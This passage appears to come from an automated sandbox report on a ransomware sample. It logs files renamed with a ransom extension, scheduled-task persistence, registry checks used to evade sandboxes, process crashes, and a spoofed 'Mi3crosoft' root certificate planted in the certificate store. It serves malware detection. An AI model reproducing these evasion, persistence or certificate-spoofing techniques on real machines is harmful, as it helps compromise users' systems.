C:\Program Files\Microsoft Office\root\Licenses16\MondoR_OEM_Perp-ul-phn.xrm-ms 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial4-pl.xrm-ms 8505.exe File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifestLoc.16.en-us.xml.payfast290.2D4-FBD-19D 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_Trial-ppd.xrm-ms.payfast290.2D4-FBD-19D 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Orange Red.xml 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-root-bridge-test.xrm-ms.payfast290.2D4-FBD-19D 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_Trial-pl.xrm-ms.payfast290.2D4-FBD-19D 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp3-ppd.xrm-ms.payfast290.2D4-FBD-19D 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial1-pl.xrm-ms.payfast290.2D4-FBD-19D 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Subscription2-pl.xrm-ms 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Subscription2-ppd.xrm-ms.payfast290.2D4-FBD-19D 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OneNoteR_Retail-ul-phn.xrm-ms 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OutlookR_Trial-ul-oob.xrm-ms.payfast290.2D4-FBD-19D 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessPipcDemoR_BypassTrial365-ppd.xrm-ms.payfast290.2D4-FBD-19D 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial2-ppd.xrm-ms 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OneNoteR_OEM_Perp-ul-oob.xrm-ms.payfast290.2D4-FBD-19D 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Garamond-TrebuchetMs.xml.payfast290.2D4-FBD-19D 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_Trial-ul-oob.xrm-ms.payfast290.2D4-FBD-19D 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessPipcR_OEM_Perp-ul-oob.xrm-ms.payfast290.2D4-FBD-19D 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentR_Retail-ul-phn.xrm-ms 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Subscription-pl.xrm-ms.payfast290.2D4-FBD-19D 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_Retail-ppd.xrm-ms.payfast290.2D4-FBD-19D 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentVNextR_Trial-ppd.xrm-ms 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription4-ul-oob.xrm-ms.payfast290.2D4-FBD-19D 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial2-pl.xrm-ms 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial1-pl.xrm-ms 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OneNoteVL_MAK-ul-oob.xrm-ms.payfast290.2D4-FBD-19D 8505.exe File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Grace-ul-oob.xrm-ms 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest5-pl.xrm-ms.payfast290.2D4-FBD-19D 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OutlookVL_MAK-ul-oob.xrm-ms.payfast290.2D4-FBD-19D 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\AccessVL_MAK-ppd.xrm-ms 8505.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 62 IoCs
pid pid_target Process procid_target 4076 2996 WerFault.exe 115 1180 3136 WerFault.exe 110 4792 3956 WerFault.exe 132 1540 3400 WerFault.exe 193 2796 2536 WerFault.exe 103 1608 4636 WerFault.exe 92 2900 132 WerFault.exe 196 7108 2196 WerFault.exe 217 5108 4712 WerFault.exe 100 2264 6568 WerFault.exe 245 6392 1104 WerFault.exe 207 5932 6972 WerFault.exe 327 7096 7740 WerFault.exe 352 7940 5192 WerFault.exe 305 3076 1628 WerFault.exe 299 4964 4172 WerFault.exe 375 3188 8024 WerFault.exe 410 5576 3152 WerFault.exe 320 3244 6516 WerFault.exe 404 3600 7880 WerFault.exe 426 6708 5212 WerFault.exe 447 6412 7436 WerFault.exe 488 7292 7264 WerFault.exe 489 6436 1300 WerFault.exe 502 8432 6148 WerFault.exe 220 8908 8352 WerFault.exe 529 3632 7912 WerFault.exe 564 2808 1636 WerFault.exe 232 10080 9720 WerFault.exe 607 9384 4236 WerFault.exe 632 8944 3924 WerFault.exe 708 4000 8244 WerFault.exe 710 3432 1452 WerFault.exe 724 8784 5636 WerFault.exe 744 6476 9920 WerFault.exe 752 7052 4536 WerFault.exe 770 10692 10332 WerFault.exe 788 10852 10512 WerFault.exe 789 8072 3224 WerFault.exe 800 10908 10760 WerFault.exe 803 14116 1272 WerFault.exe 832 8640 3092 WerFault.exe 37 14880 13656 WerFault.exe 851 10052 14596 WerFault.exe 860 9936 13028 WerFault.exe 1008 11864 12316 WerFault.exe 1016 1644 17652 WerFault.exe 1069 9840 5088 WerFault.exe 1092 11088 5300 WerFault.exe 1125 6764 9192 WerFault.exe 1143 10840 17544 Process not Found 1168 12300 3160 Process not Found 1178 15544 10456 Process not Found 1195 3960 11132 Process not Found 1251 5256 17608 Process not Found 1277 18016 7724 Process not Found 1279 12924 14872 Process not Found 1285 4564 14512 Process not Found 1298 10484 7196 Process not Found 1314 4648 10356 Process not Found 1340 13792 13460 Process not Found 1350 26532 1572 Process not Found 1404 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI OrtvqXJXXZ53o_eOhODIyXyC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI OrtvqXJXXZ53o_eOhODIyXyC.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI OrtvqXJXXZ53o_eOhODIyXyC.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 41qquykCPBvzT0C9LSCnJdjf.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz 6dhUUwCP6tPiAlc2CrtbXtjY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 6dhUUwCP6tPiAlc2CrtbXtjY.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier 6dhUUwCP6tPiAlc2CrtbXtjY.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier 41qquykCPBvzT0C9LSCnJdjf.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz 41qquykCPBvzT0C9LSCnJdjf.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 reg.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 6dhUUwCP6tPiAlc2CrtbXtjY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz 6dhUUwCP6tPiAlc2CrtbXtjY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier 6dhUUwCP6tPiAlc2CrtbXtjY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 41qquykCPBvzT0C9LSCnJdjf.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 41qquykCPBvzT0C9LSCnJdjf.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier 6dhUUwCP6tPiAlc2CrtbXtjY.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2912 schtasks.exe 3996 schtasks.exe -
Enumerates system info in registry 2 TTPs 56 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU 6dhUUwCP6tPiAlc2CrtbXtjY.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU 6dhUUwCP6tPiAlc2CrtbXtjY.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU 6dhUUwCP6tPiAlc2CrtbXtjY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS 41qquykCPBvzT0C9LSCnJdjf.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS 6dhUUwCP6tPiAlc2CrtbXtjY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS 41qquykCPBvzT0C9LSCnJdjf.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU 6dhUUwCP6tPiAlc2CrtbXtjY.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS 6dhUUwCP6tPiAlc2CrtbXtjY.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU 41qquykCPBvzT0C9LSCnJdjf.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS 6dhUUwCP6tPiAlc2CrtbXtjY.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Process not Found Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU reg.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS 6dhUUwCP6tPiAlc2CrtbXtjY.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU 41qquykCPBvzT0C9LSCnJdjf.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Kills process with taskkill 1 IoCs
pid Process 5860 taskkill.exe -
Modifies data under HKEY_USERS 43 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs sihclient.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance\ Process not Found -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\7329F241F1688278236399DB86930A7527B7A32E RUNDLL32.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\7329F241F1688278236399DB86930A7527B7A32E\Blob = 0300000001000000140000007329f241f1688278236399db86930a7527b7a32e2000000001000000b3020000308202af30820218a00302010202084f323b8c0ea0816b300d06092a864886f70d01010b050030743133303106035504030c2a4d693363726f736f667420526f6f7420436572746966696361746520417574686f726974792032303130311e301c060355040a0c154d6963726f736f667420436f72706f726174696f6e310b30090603550406130255533110300e06035504070c075265646d6f6e64301e170d3139303832383136333932305a170d3233303832373136333932305a30743133303106035504030c2a4d693363726f736f667420526f6f7420436572746966696361746520417574686f726974792032303130311e301c060355040a0c154d6963726f736f667420436f72706f726174696f6e310b30090603550406130255533110300e06035504070c075265646d6f6e6430819f300d06092a864886f70d010101050003818d0030818902818100dc9215864196614e9c7f47aec861d377a8fe158f2d6a3b3de2261c54e807e548c2cd9a553dfa70ae0ae29dac5318567e9537c84776637760f02ce842b3721935f3c64deb2db2e01d17e53216ebc4d9470b566f690585639b1e473cebb9a5db086d3c9b01bc682f867f215e7178366e1542864b49f9756013650425256d15563b0203010001a34a3048300f0603551d130101ff040530030101ff30350603551d11042e302c822a4d693363726f736f667420526f6f7420436572746966696361746520417574686f726974792032303130300d06092a864886f70d01010b05000381810058168b401020fc48ada53e454a0b08309234cfe8d34689f47b3ef64b484ae6772cb1b89ca97b2df2ac294e703e82adec466a1cd5eeaeb67fa763b2e31f3665564eb2323c24d483196a8d2f3d2ccc479cc773d42a5e785c8dc113a1708231e42bcd1eb8d7eb883ddbd3522df872853b8702b3e2865e7715e580fdb7cd50959307 RUNDLL32.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4332 Setup.exe 4332 Setup.exe 1056 WerFault.exe 1056 WerFault.exe 1056 WerFault.exe 1056 WerFault.exe 1180 WerFault.exe 1180 WerFault.exe 4076 WerFault.exe 4076 WerFault.exe 4792 WerFault.exe 4792 WerFault.exe 1524 powershell.exe 1524 powershell.exe 2884 gBaUMdeBsiBdikEiNiY5NoXS.exe 2884 gBaUMdeBsiBdikEiNiY5NoXS.exe 5368 powershell.exe 5368 powershell.exe 1540 41qquykCPBvzT0C9LSCnJdjf.exe 1540 41qquykCPBvzT0C9LSCnJdjf.exe 4732 OrtvqXJXXZ53o_eOhODIyXyC.exe 4732 OrtvqXJXXZ53o_eOhODIyXyC.exe 2796 WerFault.exe 2796 WerFault.exe 2900 reg.exe 2900 reg.exe 1608 WerFault.exe 1608 WerFault.exe 3256 Process not Found 3256 Process not Found 3256 Process not Found 3256 Process not Found 3256 Process not Found 3256 Process not Found 3256 Process not Found 3256 Process not Found 3256 Process not Found 3256 Process not Found 3256 Process not Found 3256 Process not Found 3256 Process not Found 3256 Process not Found 3256 Process not Found 3256 Process not Found 3256 Process not Found 3256 Process not Found 3256 Process not Found 3256 Process not Found 3256 Process not Found 3256 Process not Found 7108 41qquykCPBvzT0C9LSCnJdjf.exe 7108 41qquykCPBvzT0C9LSCnJdjf.exe 3256 Process not Found 3256 Process not Found 3256 Process not Found 3256 Process not Found 3256 Process not Found 3256 Process not Found 3256 Process not Found 3256 Process not Found 3256 Process not Found 3256 Process not Found 1524 powershell.exe 3256 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3256 Process not Found -
Suspicious behavior: MapViewOfSection 19 IoCs
